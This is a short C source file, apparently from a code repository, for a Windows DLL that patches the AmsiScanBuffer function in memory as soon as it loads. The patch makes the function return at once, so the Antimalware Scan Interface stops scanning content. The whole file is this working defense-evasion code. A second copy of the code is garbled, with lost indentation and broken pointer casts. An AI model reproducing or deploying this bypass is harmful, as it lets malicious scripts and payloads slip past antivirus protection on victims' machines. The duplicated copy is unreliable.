Philts/CrappyNativeAMSIBypass.c

## CrappyNativeAMSIBypass.c

#include <Windows.h>


BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
	)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
		auto dllHandle = LoadLibrary("AMSI.dll");
		void* AmsiScanbufferAddr = (void*)GetProcAddress(dllHandle, "AmsiScanBuffer");
		DWORD oldProtection;
		BOOL vpRet = VirtualProtect(AmsiScanbufferAddr, 0x0015, 0x40, &oldProtection);
		if (!vpRet){
			return FALSE;
		}

		BYTE patch[6] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
		memcpy((void*)((UINT64)AmsiScanbufferAddr), (void*)patch,sizeof(patch));
		break;
	}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

	#include <Windows.h>



	BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved
	)
	{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
	auto dllHandle = LoadLibrary("AMSI.dll");
	void* AmsiScanbufferAddr = (void*)GetProcAddress(dllHandle, "AmsiScanBuffer");
	DWORD oldProtection;
	BOOL vpRet = VirtualProtect(AmsiScanbufferAddr, 0x0015, 0x40, &oldProtection);
	if (!vpRet){
	return FALSE;
	}

	BYTE patch[6] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
	memcpy((void)((UINT64)AmsiScanbufferAddr), (void)patch,sizeof(patch));
	break;
	}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
	break;
	}

	return TRUE;
	}